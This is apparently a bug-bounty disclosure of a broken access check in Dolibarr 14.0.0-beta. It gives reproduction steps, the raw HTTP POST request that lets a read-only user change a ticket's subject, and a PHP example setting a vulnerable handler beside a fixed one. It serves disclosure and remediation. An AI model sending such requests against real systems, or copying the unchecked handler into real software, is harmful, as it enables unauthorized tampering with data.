Improper Handling of Insufficient Privileges in dolibarr/dolibarr

Valid

Reported on May 22nd 2021


💥 BUG

An unprivileged user can modify the subject of a ticket.

💥 IMPACT

A user who holds only the read permission on tickets can modify a ticket's subject.

💥 TESTED VERSION

Dolibarr 14.0.0-beta

💥 STEPS TO REPRODUCE

1. From the admin account, add user B as a normal user.
Then grant user B only the following permission in the Ticket module:
--> See tickets.
User B can therefore view tickets but should not be able to modify them.

2. From the admin account, open the Ticket module and create a ticket.

3. Log in as user B and send the request below to modify the subject of the ticket created above.

POST /dolibarr-develop/htdocs/ticket/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/ticket/card.php?action=editsubject&id=1
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

action=setsubject&token=$2y$10$tK..OGNlxaeIvPVQvMXyx.SeRU554JpFLtefFhZpG3vN9NgvfN9qK&id=1&subject=tick12+by_usesssr&modify=Modify

In the POST body of this request, the id parameter is set to the ID of the ticket whose subject is to be changed; the server accepts the change although user B only has the "See tickets" permission.
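The root cause is a state-changing action that is reachable without a server-side check of the write permission. The example below is added here and is not Dolibarr's own card.php: it is a reduced "setsubject" handler in its unchecked shape beside a hardened shape, run against a constructed read-only user and a constructed request body in the shape of the report. The $user->rights->ticket->write right and the accessforbidden() refusal are assumed Dolibarr conventions and are stubbed so the file runs on its own; the hardened handler refuses the request that the unchecked one accepts.

```php
<?php
// Added example, not Dolibarr's own card.php: a reduced "setsubject"
// handler in its unchecked shape and in a hardened shape. The $user
// object and its rights tree stand in for Dolibarr's
// $user->rights->ticket->write (assumed name); the refusal stands in
// for accessforbidden().

// Constructed: a user who holds only the "See tickets" permission.
function make_readonly_user(): stdClass {
    $user = new stdClass;
    $user->rights = new stdClass;
    $user->rights->ticket = new stdClass;
    $user->rights->ticket->read  = true;
    $user->rights->ticket->write = false;
    return $user;
}

// Unchecked shape: the handler assumes only the editing UI would post
// action=setsubject, so a valid session plus a valid CSRF token is
// enough to overwrite whichever ticket the caller names by id.
function setsubject_unchecked(stdClass $user, array $post, array &$tickets): bool {
    if (($post['action'] ?? '') !== 'setsubject') return false;
    $id = (int) ($post['id'] ?? 0);
    if (!isset($tickets[$id])) return false;
    $tickets[$id]['subject'] = $post['subject'] ?? '';
    return true;
}

// Hardened shape: the state-changing action checks the write right on
// the server. The CSRF token is not an authorization control: user B is
// logged in and receives a valid token like any other user.
function setsubject_checked(stdClass $user, array $post, array &$tickets): bool {
    if (($post['action'] ?? '') !== 'setsubject') return false;
    if (empty($user->rights->ticket->write)) return false; // accessforbidden() in Dolibarr
    $id = (int) ($post['id'] ?? 0);
    if (!isset($tickets[$id])) return false;
    $tickets[$id]['subject'] = $post['subject'] ?? '';
    return true;
}

// Constructed request body in the shape of the report (token is a placeholder).
$post = ['action' => 'setsubject', 'token' => 'TOKEN_PLACEHOLDER',
         'id' => '1', 'subject' => 'tick12 by_usesssr', 'modify' => 'Modify'];
$user = make_readonly_user();

// Run the same read-only request through each shape on a fresh ticket store.
$tickets = [1 => ['subject' => 'original subject']];
var_dump(setsubject_unchecked($user, $post, $tickets), $tickets[1]['subject']);
$tickets = [1 => ['subject' => 'original subject']];
var_dump(setsubject_checked($user, $post, $tickets), $tickets[1]['subject']);
```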

Laurent Destailleur confirmed that a fix has been merged in facd6a, 2 months ago.
Laurent Destailleur has been awarded the fix bounty.